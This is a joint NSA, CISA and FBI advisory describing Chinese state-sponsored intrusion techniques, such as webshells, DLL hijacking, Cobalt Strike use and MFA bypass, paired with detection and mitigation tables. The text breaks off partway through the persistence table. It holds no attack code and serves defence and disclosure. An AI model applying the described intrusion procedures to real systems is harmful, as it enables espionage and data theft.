### Summary
_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9, and MITRE D3FEND™ framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._
The National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People’s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China’s long-term economic and military development objectives.
This Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.
To increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.
[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.
### Technical Details
#### **Trends in Chinese State-Sponsored Cyber Operations**
NSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:
* **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community’s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.
* **Exploitation of Public Vulnerabilities. **Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability’s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:
* CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),
* CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and
* NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).
* **Encrypted Multi-Hop Proxies. **Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.
#### **Observed Tactics and Techniques**
Chinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).
Refer to Appendix A: Chinese State-Sponsored Cyber Actors’ Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.

_Figure 1: Example of tactics and techniques used in various cyber operations._
### Mitigations
NSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:
* **Patch systems and equipment promptly and diligently. **Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle.
**Note: **for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.
* **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.
* **Use protection capabilities to stop malicious activity. **Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.▪
### Resources
Refer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ ](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>)for previous reporting on Chinese state-sponsored malicious cyber activity.
### Disclaimer of Endorsement
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
### Purpose
This document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)
### Trademark Recognition
MITRE and ATT&CK are registered trademarks of The MITRE Corporation. • D3FEND is a trademark of The MITRE Corporation. • Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. • Pulse Secure is a registered trademark of Pulse Secure, LLC. • Apache is a registered trademark of Apache Software Foundation. • F5 and BIG-IP are registered trademarks of F5 Networks. • Cobalt Strike is a registered trademark of Strategic Cyber LLC. • GitHub is a registered trademark of GitHub, Inc. • JavaScript is a registered trademark of Oracle Corporation. • Python is a registered trademark of Python Software Foundation. • Unix is a registered trademark of The Open Group. • Linux is a registered trademark of Linus Torvalds. • Dropbox is a registered trademark of Dropbox, Inc.
### APPENDIX A: Chinese State-Sponsored Cyber Actors’ Observed Procedures
**Note: **D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.
### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)]
_Table 1: Chinese state-sponsored cyber actors’ Reconnaissance TTPs with detection and mitigation recommendations_
Threat Actor
Technique / Sub-Techniques
|
Threat Actor Procedure(s)
|
Detection and Mitigation Recommendations
|
Defensive Tactics and Techniques
---|---|---|---
Active Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)]
|
Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft® 365 (M365), formerly Office® 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python® scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization’s fully qualified domain name, IP address space, and open ports to target or exploit.
|
Minimize the amount and sensitivity of data available to external parties, for example:
* Scrub user email addresses and contact lists from public websites, which can be used for social engineering,
* Share only necessary data and information with third parties, and
* Monitor and limit third-party access to the network.
Active scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.
|
Detect:
* Network Traffic Analysis
* Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
Gather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)]
### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]
_Table II: Chinese state-sponsored cyber actors’ Resource Development TTPs with detection and mitigation recommendations_
Threat Actor
Technique / Sub-Techniques
|
Threat Actor Procedure(s)
|
Detection and Mitigation Recommendations
| Defensive Tactics and Techniques
---|---|---|---
Acquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]
|
Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.
|
Adversary activities occurring outside the organization’s boundary of control and view makes mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.
|
N/A
Stage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)]
Obtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]:
* Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]
|
Chinese state-sponsored cyber actors have been observed using Cobalt Strike® and tools from GitHub® on victim networks.
|
Organizations may be able to identify malicious use of Cobalt Strike by:
* Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed.
* Looking for the default Cobalt Strike TLS certificate.
* Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.
* Review the traffic destination domain, which may be malicious and an indicator of compromise.
* Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.
* Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.
| N/A
### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]
_Table III: Chinese state-sponsored cyber actors’ Initial Access TTPs with detection and mitigation recommendations_
Threat Actor Technique /
Sub-Techniques
|
Threat Actor Procedure(s)
|
Detection and Mitigation Recommendations
|
Detection and Mitigation Recommendations
---|---|---|---
Drive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]
|
Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.
|
* Ensure all browsers and plugins are kept up to date.
* Use modern browsers with security features turned on.
* Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript®, restrict browser extensions, etc.
* Use adblockers to help prevent malicious code served through advertisements from executing.
* Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes.
* Use browser sandboxes or remote virtual environments to mitigate browser exploitation.
* Use security applications that look for behavior used during exploitation, such as Windows Defender® Exploit Guard (WDEG).
|
Detect:
* Identifier Analysis
* Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
* URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
* File Analysis
* Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
Isolate:
* Execution Isolation
* Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
* Network Isolation
* DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
* Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]
Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]
|
Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources.
Chinese state-sponsored cyber actors have also been observed:
* Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange® Outlook Web Access (OWA®) and plant webshells.
* Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.
* Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.
|
Review previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.
Additional mitigations include:
* Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.
* Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).
* Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.
* Disable protocols using weak authentication.
* Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].
* When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).
* Use automated tools to audit access logs for security concerns.
* Where possible, enforce MFA for password resets.
* Do not include Application Programing Interface (API) keys in software version control systems where they can be unintentionally leaked.
|
Harden:
* Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]
* Platform Hardening
* Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]
Detect:
* File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)]
* Network Traffic Analysis
* Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
* Process Analysis
* Process Spawn Analysis
* Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
Phishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]:
* Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)]
* Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]
|
Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures.
These compromise attempts use the cyber actors’ dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.
|
* Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.
* Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.
* Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`,`.vbs`)
* Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.
* Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
* Prevent users from clicking on malicious links by stripping hyperlinks or implementing "URL defanging" at the Email Security Gateway or other email security tools.
* Add external sender banners to emails to alert users that the email came from an external sender.
|
Harden:
* Message Hardening
* Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]
* Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]
Detect:
* File Analysis
* Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
* Identifier Analysis
* Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
* URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
* Message Analysis
* Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]
* Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)]
External Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]
|
Chinese state-sponsored cyber actors have been observed:
* Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.
* Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).
* Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `apsx`, `php`, `japx`, and `cfm`.
**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.
**Note: **this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].
|
* Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.
* Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.
* Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).
* Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.
* Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.
* Review and verify all connections between customer systems, service provider systems, and other client enclaves.
|
Harden:
* Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]
Detect:
* Network Traffic Analysis
* Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]
* Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]
* Process Analysis
* Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
* Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]
Valid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:
* Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]
* Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]
|
Chinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.
**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].
|
* Adhere to best practices for password and permission management.
* Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage
* Do not store credentials or sensitive data in plaintext.
* Change all default usernames and passwords.
* Routinely update and secure applications using Secure Shell (SSH).
* Update SSH keys regularly and keep private keys secure.
* Routinely audit privileged accounts to identify malicious use.
|
Harden:
* Credential Hardening
* Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]
Detect:
* User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]
* Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]
* Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]
### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]
_Table IV: Chinese state-sponsored cyber actors’ Execution TTPs with detection and mitigation recommendations_
Threat Actor Technique /
Sub-Techniques
|
Threat Actor Procedure(s)
|
Detection and Mitigation Recommendations
|
Defensive Tactics and Techniques
---|---|---|---
Command and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]:
* PowerShell® [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]
* Windows® Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]
* Unix® Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]
* Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]
* JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]
* Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]
|
Chinese state-sponsored cyber actors have been observed:
* Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).
* Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network.
* Employing Python scripts to exploit vulnerable servers.
* Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux® servers in the victim network.
|
PowerShell
* Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)
* Push Powershell logs into a security information and event management (SIEM) tool.
* Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.
* Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.
* Remove PowerShell if it is not necessary for operations.
* Restrict which commands can be used.
Windows Command Shell
* Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts.
* Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled.
* Monitor for and investigate other unusual or suspicious scripting behavior.
Unix
* Use application controls to prevent execution.
* Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious.
* If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious.
Python
* Audit inventory systems for unauthorized Python installations.
* Blocklist Python where not required.
* Prevent users from installing Python where not required.
JavaScript
* Turn off or restrict access to unneeded scripting components.
* Blocklist scripting where appropriate.
* For malicious code served up through ads, adblockers can help prevent that code from executing.
Network Device Command Line Interface (CLI)
* Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.
* Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.
* Ensure least privilege principles are applied to user accounts and groups.
|
Harden:
* Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]
Detect:
* Process Analysis
* Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]
Isolate:
* Execution Isolation
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
Scheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]
* Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]
* Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]
|
Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtask` or `crontab` to create and schedule tasks that enumerate victim devices and networks.
**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].
|
• Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity.
• Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (Older version of Windows) to look for changes in `%systemroot%\System32\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities—such as PowerShell or Windows Management Instrumentation (WMI)—that do not conform to typical administrator or user actions.
|
Detect:
* Platform Monitoring
* Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)]
* Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]
* System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]
* System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]
Isolate:
* Execution Isolation
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
User Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]
* Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]
* Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]
|
Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.
|
* Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.
* Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
* Use a domain reputation service to detect and block suspicious or malicious domains.
* Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
* Ensure all browsers and plugins are kept up to date.
* Use modern browsers with security features turned on.
* Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.
|
Detect:
* File Analysis
* Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]
* File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]
* Identifier Analysis
* Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]
* URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]
* Network Traffic Analysis
* DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]
Isolate:
* Execution Isolation
* Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
* Network Isolation
* DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
* Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]
### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]
_Table V: Chinese state-sponsored cyber actors’ Persistence TTPs with detection and mitigation recommendations_
Threat Actor Technique /
Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Hijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]:
* DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]
|
Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process.
**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].
|
* Disallow loading of remote DLLs.
* Enable safe DLL search mode.
* Implement tools for detecting search order hijacking opportunities.
* Use application allowlisting to block unknown DLLs.
* Monitor the file system for created, moved, and renamed DLLs.
* Monitor for changes in system DLLs not associated with updates or patches.
* Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).
|
Detect:
* Platform Monitoring
* Operating System Monitoring
* Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
Isolate:
* Execution Isolation
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
Modify Authentication Process [[T1556](<https://attack.mitre.org/versions/v9/techniques/T1556>)]
* Domain Controller Authentication [[T1556.001](<https://attack.mitre.org/versions/v9/techniques/T1556/001>)]
|
Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network.
